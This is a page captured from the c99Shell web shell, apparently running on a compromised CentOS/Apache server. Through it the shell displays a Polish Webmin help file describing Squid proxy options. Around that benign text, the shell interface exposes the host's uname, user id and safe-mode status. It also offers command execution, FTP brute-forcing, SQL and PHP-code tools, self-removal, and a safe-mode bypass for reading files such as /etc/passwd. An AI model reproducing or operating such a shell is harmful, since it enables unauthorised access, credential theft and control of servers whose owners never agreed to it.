!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/squid/help/   drwxr-xr-x
Free 50.88 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_misc.pl.html (5.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Opcje różne
Początkowe kontrolne adresy DNS: Serwery DNS, do których Squid wyśle zapytania, aby sprawdzić czy przeszukiwania DNS działąją prawidłowo.

Rotacja logu po SIGUSR1: Domyślnie 10 lub 0, w zależności od systemu. Określa liczbę rotacji logu, które będą wykonane, gdy wpiszesz 'squid -k rotate'. Wartością domyślną jest 10, co spowoduje rotację z rozszerzeniami od 0 do 9. Ustawienie tego parametru na 0 wyłączy rotację, ale logi będą nadal zamykane i otwierane powtórnie. Umożliwi ci to samodzielną zmianę nazw logów chwilę przed wysłąniem sygrału rotacji.

Zauważ, że polecenie 'squid -k rotate' zazwyczaj wysyła sygnał USR1 do działającego procesu Squida. W pewnych sytuacjach (np. na Linuksie z asynchroniczną obsługą wejścia/wyjścia) USR1 jest wykorzystywany do innych celów, więc rotacja -k korzysta z innego sygnału. Lepiej mieć nawyk używania 'squid -k rotate' zamiast 'kill -USR1 '.

Tekst w komunikatach błędów: Tekst HTML umieszczany w komunikatach błędów. Wpisz tu URL "mailto" na adres twojego administratora lub, być może, przekierowanie do strony WWW twojej organizacji.

Aby umieścić to w twoich komunikatach o błędach, musisz zmodyfikować wzorcowe pliki komunikatów o błędach (znajdujące się w katalogu "errors"). Gdziekolwiek chcesz, aby powyższa linia się pojawiła, wstaw w pliku znacznik '%L'.

Statystyka wg klientów: Jeśli chcesz wyłączyć tworzenie statystyk dla każdego klienta, wyłącz tę opcję.

Nagłówek X-Forwarded-For: Domyślnie włączony. Jeśli opcja ta jest włączona, Squid będzie dołączał nazwę lub adres IP Twojego systemu do zapytań, które przekazuje. Domyślnie wygląda on jak w przekazywanym zapytaniu HTTP, czyli jak:

X-Forwarded-For: 192.1.2.3

Jeśli wyłączysz tę opcję, będzie wyglądać jak:

X-Forwarded-For: unknown

Logować zapytania ICP: Domyślnie włączone. Jeśli opcja ta jest włączona, zapytania ICP są logowane do access.log. Jeśli obciążenie ICP Twojego Squida jest BARDZO duże, możesz chcieć to wyłączyć, aby przyspieszyć działanie i uprościć analizę logu.

Minimalna liczba bezpośrednich skoków: Domyślnie 4. Jeśli wykorzystywane jest pingowanie ICMP, dla miejsc, które są nie dalej niż podana liczba przeskoków będzie wykonywane pobieranie bezpośrednie pobieranie.

Zachować pamięć na przyszłość: Domyślnie 'Tak'. Jeśli ta opcja jest włączona, Squid będzie utrzymywał przydzielone (ale nieużywane) obszary pamięci dla przyszłego wykorzystania. Jeśli pamięć jest cenna w&twoim systemie i sądzisz, że twoja biblioteka zarządzania pamięcią jest wydajniejsza niż procedury Squida, wyłącz ją. Zachowywana ilość pamięci: Domyślnie 'Nieograniczona'. Jeśli podano wartość niezerową, Squid będzie utrzymywał co najmniej podaną ilość przydzielonej (ale nieużywanej) pamięci. Wszystkie wywołania free(), które przekroczą tę granicę będą obsługiwane przez twoją bibliotekę zarządzania pamięcią. Squid nie przydziela wstępnie żadnej pamięci lecz, po prostu, przechowuje obiekty, które w przeciwnym przypadku byłyby zwolnione. Wobec tego, można bezpiecznie ustawić stosunkowo wysoką wartość tej opcji nawet, jeśli twoja konfiguracja będzie wykorzystywała mniej pamięci.

Jeśli wartość tego parametru nie jest ustawiona (domyślnie) lub ustawiona na zero, Squid będzie utrzymywał tyle pamięci ile zdoła. Oznacza to, że nie będzie żadnego ograniczenia na łączną ilość pamięci wykorzystywaną do przechowywania.

Przepuszczanie nagłówków: Domyślnie 'Wszystkie nagłówki'. Opcja ta zastępuje stary parametr 'Ukrywanie tożsamości' czymś, co jest dużo lepiej konfigurowalne. Można obecnie podać, które dokładnie nagłówki powinny, a które nie powinny być usunięte z wychodzących zapytań.

Są dwie metody wykorzystania tej opcji. Można albo przepuszczać określone nagłówki (blokując wszystkie inne), albo blokować określone nagłówki (przepuszczając wszystkie inne).

Fałszywy program użytkownika: Domyślnie 'brak'. Jeśli nagłówek 'User-Agent' jest odfiltrowywany w opcji Przepuszczanie nagłówków, może to powodować odrzucanie zapytań przez niektóre serwery WWW. Użycie tej opcji pozwala go podrobić.

Host akceleracji HTTP: Domyślnie 'brak'. Jeśli Squid ma działać jako akcelerator httpd, należy podać tu adres rzeczywistego serwera HTTP.

Port akceleracji HTTP: Domyślnie 'brak'. Dodatkowo podając Host akceleracji HTTP, trzeba tu podać port rzeczywistego serwera, o ile Squid ma działać jako akcelerator.

Akceleracja HTTP i proxy: Domyślnie wyłączone. Opcję tę należy włączyć, jeśli Squid ma działać jako tradycyjne proxy a jednocześnie stanowić akcelerator HTTP. Opcja ta powinna być włączona dla przezroczystego proxy.

Akceleracja HTTP korzysta z nagłówka Host: Domyślnie wyłączone. Zapytania HTTP/1.1 zawierają nagłówek 'Host:', który zasadniczo zawiera nazwę hosta z URL-a. Squid może stanowić akcelerator dla różnych serwerów HTTP spoglądając na ten nagłówek. Jednakże, Squid NIE sprawdza zawartości nagłówka 'Host:', więc otwiera się tu duża dziura w bezpieczeństwie. Zaleca się pozostawienie tej opcji wyłączonej, chyba że jesteś pewien, iż wiesz co robisz.

Jednakże, trzeba będzie włączyć tę opcję, jeśli Squid ma działać jako przezroczyste proxy. W przeciwnym przypadku, zapytania do serwerów wirtualnych wymagających nagłówka 'Host:', nie będą prawidłowo buforowane.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0127 ]--